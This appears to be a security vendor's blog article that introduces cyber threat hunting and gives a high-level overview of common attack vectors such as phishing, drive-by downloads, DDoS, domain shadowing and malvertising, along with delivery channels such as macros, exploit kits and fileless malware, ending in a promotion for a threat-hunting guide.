It’s generally accepted that the best defense is a good offense. In cybersecurity terms that means taking a more proactive approach to catching our cyber adversaries. Cyber threat hunting is an effective method for searching your network for malware and other threats that have evaded traditional security defenses. To be a successful threat hunter it’s important to understand the adversaries we’re facing, as well as the tricks and techniques they use. Let's take a look at a few.
Common Attack Vectors
Hackers have many tools in their arsenal to gain access to a computer or network server. Here are some attack vectors that are commonly used by cybercriminals to deliver a payload and / or exploit system vulnerabilities.
Using an email disguised as a legitimate message, hackers entice the recipient to open either an infected attachment or click a link that takes them to an infected website. The goal is to lure individuals to give up their sensitive data, such as personally identifiable information, banking and credit card numbers, and passwords. Phishing accounts for 90% of all successful cyberattacks.
Malware, short for “malicious software,” is software (or script or code) designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems and mobile devices. Malware is a tool of choice for hackers because it's effective, easy-to-use, and readily available. There are different types of malware that differ in infection and propagation characteristics.
In a drive-by-download, malware is inadvertently downloaded from a legitimate site that has been compromised without any action from the user. It can happen when vising a website, viewing an e-mail message, or by clicking on a deceptive pop-up window. It typically takes advantage of vulnerabilities in the user’s operating system or other program.
Distributed Denial-of-Service (DDoS)
A DDoS is an attempt to make a machine or network resource unavailable for its intended use. It often consumes more computer resources than a device can handle or disrupts by disabling communication services. It's typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
First the hacker obtains domain registrar credentials through a successful attack, usually phishing. This allows them to add host records to an organization’s DNS records and redirect them to their malicious IPs.
For example, let's say you've determined that you will never worry about traffic to "somelocalcompany.com," and you whitelist the domain. They fall victim to domain shadowing, and now you may have traffic going to "somemalicioushostinrussia.somelocalcompany.com" and not even notice it. So much for whitelisting by domain! Your systems are headed out to Russia to pick up some nasty code!
These are online ads that are owned by cybercriminals. Malicious software is downloaded onto the user’s systems when they click the infected ad, which can be on any site, even popular ones. They are often redirected to an exploit kit landing page. The exploit kit can can successfully load malware into a system without user consent. Often the victim is unaware that anything suspicious happened.
Common Delivery Channels
Opening a phishing email usually isn’t enough to get a user infected with malware. Typically users must open an infected attachment or click a malicious link that takes them to a compromised website. Once action is taken, the malware is delivered. Following are three common malware delivery channels.
Macros are codes embedded within another program to automate repetitive tasks. Hiding malicious macros inside Microsoft Office programs, like Word, used to be the prevailing technique for launching attacks. Though Microsoft has since developed security features that greatly reduces the use of macro-based malware, the technique is still in use. Malware is installed when the recipient opens the infected document.
An exploit kit is a software system that runs on web servers with the purpose of identifying software vulnerabilities in a client’s machine and exploiting the discovered vulnerabilities. It’s a tool that hackers use to break in – like picking a lock. Once installed, the kit uploads and executes a variety of malicious code. They are sold in cybercriminal circles, often with vulnerabilities already loaded onto them, and are extremely easy to use.
Learn more in Exploit Kit 101 - What You Need to Know.
Fileless Malware / Non-Malware
Fileless malware is not really fileless, it just isn’t an executable file (.exe). When you are compromised using this technique, there isn’t a malicious program sitting on your PC. It operates by using legitimate programs, typically PowerShell, for malicious purposes. A malicious encoded script can be decoded by PowerShell, and then reach out to a command and control (C&C) server without writing any files to the local hard drive.
Learn more in What you Need to Know about Fileless Malware.
THE SAGE ADVICE GUIDE TO CYBER THREAT HUNTING
As cyberattacks continue to soar, it's time to get proactive when protecting your network. You can’t simply sit back and wait for an automated alert to let you know you’ve been breached. You need to actively seek out potentially malicious behavior on your network. That’s why we’re seeing a shift to a more proactive approach... Cyber Threat Hunting. Learn how to defend your network. Learn more in the Sage Advice Guide to Cyber Threat Hunting.